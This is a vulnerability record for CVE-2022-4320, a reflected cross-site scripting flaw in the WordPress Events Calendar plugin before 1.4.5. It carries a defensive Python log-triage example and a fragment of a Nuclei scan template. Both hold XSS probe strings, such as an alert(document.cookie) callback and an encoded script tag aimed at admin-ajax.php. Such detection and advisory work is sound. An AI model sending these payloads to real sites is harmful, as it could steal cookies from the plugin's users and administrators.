CVE-2022-4320
Published 2023-01-16
Priority: P3 | Severity: medium | CVSS 3.1 base score: 6.1
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
EPSS: 0.89% (54.9th percentile)
The WordPress Events Calendar WordPress plugin before 1.4.5 does not sanitize and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against both unauthenticated and authenticated users (such as high-privilege ones like admin).
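The flaw is a parameter echoed into the response without validation. As an added example (not code from the CVE record, the plugin, or the Nuclei project), the block below shows the whitelist check a JSONP-style `callback` parameter should pass before being reflected, and reuses that check to triage constructed web-server access-log lines for requests to the `cdaily` AJAX action seen in the scan template; the endpoint and parameter names come from the template, the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed example: the validation a JSONP-style endpoint should apply to
# its ``callback`` parameter, and the same check applied to access logs to
# spot requests that try to reflect markup through the cdaily AJAX action.
SAFE_CALLBACK = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*$")

def is_safe_callback(value: str) -> bool:
    """True only for a plain dotted JavaScript identifier (e.g. jQuery17_1, window.cb)."""
    return bool(SAFE_CALLBACK.fullmatch(value))

def suspicious_request(url: str) -> bool:
    """Flag admin-ajax.php requests for action=cdaily whose callback is not a safe identifier."""
    parts = urlsplit(url)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return False
    qs = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    if qs.get("action") != ["cdaily"]:
        return False
    return any(not is_safe_callback(v) for v in qs.get("callback", []))

# Constructed access-log lines in combined log format, not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Jan/2023:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=cdaily&subaction=cd_displayday&callback=jQuery17_1 HTTP/1.1" 200 512
203.0.113.9 - - [16/Jan/2023:10:00:02 +0000] "GET /wp-admin/admin-ajax.php?action=cdaily&subaction=cd_dismisshint&callback=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 88
203.0.113.9 - - [16/Jan/2023:10:00:03 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat&callback=%3Cb%3E HTTP/1.1" 200 30
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

def find_probes(log_text: str) -> list[tuple[str, str]]:
    """Return (client ip, request url) for every log line matching the probe pattern."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and suspicious_request(m["url"]):
            hits.append((m["ip"], m["url"]))
    return hits

if __name__ == "__main__":
    for ip, url in find_probes(SAMPLE_LOG):
        print(f"suspicious callback from {ip}: {url}")
```

Only the second constructed line is reported; the heartbeat request is ignored because the filter is scoped to the `cdaily` action the template targets.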
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mhsoftware | wordpress_events_calendar_plugin | < 1.4.5 | 1.4.5 |
No detection rules found.
Nuclei template: WordPress Events Calendar <1.4.5 - Cross-Site Scripting (nuclei, CVSS 6.1)

CVE-2022-4320 [MEDIUM] WordPress Events Calendar <1.4.5 - Cross-Site Scripting

```yaml
# Template fragment as shown on the page. The first request path survives only as
# the fragment "WordPress Events Calendar alert(document.cookie)'" and the HTML
# tags inside the payloads were lost in extraction; neither is reconstructed here.
        - '{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_dismisshint&callback=alert(document.cookie)'
        - '{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_displayday&callback=1&bymethod=&by_id=/../../../../../../r%26_=-->alert(document.cookie)'

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'imgNavLeftXX\">alert(document.cookie)'
          - 'alert(document.cookie)({});'
          - '>alert(document.cookie).js'
        condition: or

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a00463044022024016b6171d780cf18a7f3453ca3addae2ea0778b098cb9ae4e687ddb0cceef50220464682778a7b1edf9563d033d5b7e4d76348533a0d0f2d3abe9748b3046a2875:922c64590222798bb761d5b6d8e72950
```